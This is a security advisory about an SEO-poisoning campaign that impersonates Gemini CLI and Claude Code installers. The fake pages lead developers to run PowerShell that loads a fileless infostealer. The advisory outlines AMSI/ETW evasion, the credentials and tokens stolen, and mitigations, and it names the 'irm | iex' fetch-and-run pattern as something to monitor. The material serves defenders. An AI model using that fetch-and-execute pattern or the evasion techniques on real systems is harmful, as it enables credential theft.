Hackers Use SEO Poisoning to Impersonate Gemini CLI and Claude Code Installers

Severity

Medium

Detail

Threat actors are targeting software developers through SEO poisoning campaigns that impersonate popular AI coding tools such as Gemini CLI and Claude Code. By manipulating search engine rankings, attackers push fake installation pages above legitimate results, tricking developers into executing malicious PowerShell commands.

The campaign, active since March 2026, delivers a fileless infostealer capable of harvesting credentials, session tokens, OAuth data, and sensitive files from developer systems and enterprise collaboration platforms.

How?

The attack begins when developers search online for installation instructions for tools like Gemini CLI or Claude Code. Victims are redirected to malicious websites designed to closely mimic official documentation pages. These fake sites instruct users to copy and execute a PowerShell command, which silently downloads and runs a malicious script entirely in memory.

To avoid suspicion, the attackers simultaneously install the legitimate AI tool through npm, making the installation appear successful while the infostealer operates in the background.

Once executed, the malware disables Event Tracing for Windows (ETW) and bypasses the Antimalware Scan Interface (AMSI) to reduce visibility and evade detection. The PowerShell payload contains thousands of lines of junk code and sandbox checks designed to hinder analysis.

The infostealer then harvests sensitive data from the infected machine, including OAuth tokens, CI/CD credentials, VPN details, browser session cookies, and credentials from applications such as Slack, Microsoft Teams, Discord, and Telegram. Because valid session cookies can bypass passwords and multi-factor authentication, attackers can directly access enterprise environments and cloud services.

The malware also loads multiple C# components at runtime to extract Windows Credential Manager entries, fingerprint the system, and enumerate running processes. All operations remain fileless, leaving minimal forensic artifacts on disk.

Researchers linked the activity to over 30 malicious domains impersonating legitimate developer tools and software platforms, including Node.js, Chocolatey, KeePassXC, and Monero, indicating a broader and coordinated campaign targeting the software development ecosystem.

Conclusion

This campaign highlights how threat actors are increasingly abusing trusted developer workflows and search engine manipulation to compromise enterprise environments through developer endpoints.

Organizations should monitor for suspicious PowerShell activity, especially irm | iex execution patterns and hidden PowerShell processes. Enforcing PowerShell Constrained Language Mode, implementing phishing-resistant authentication such as FIDO keys, restricting token lifetimes, and educating developers to verify installation sources can significantly reduce exposure to these attacks.

Source

https://cybersecuritynews.com/hackers-use-seo-poisoning-to-impersonate-gemini-cli/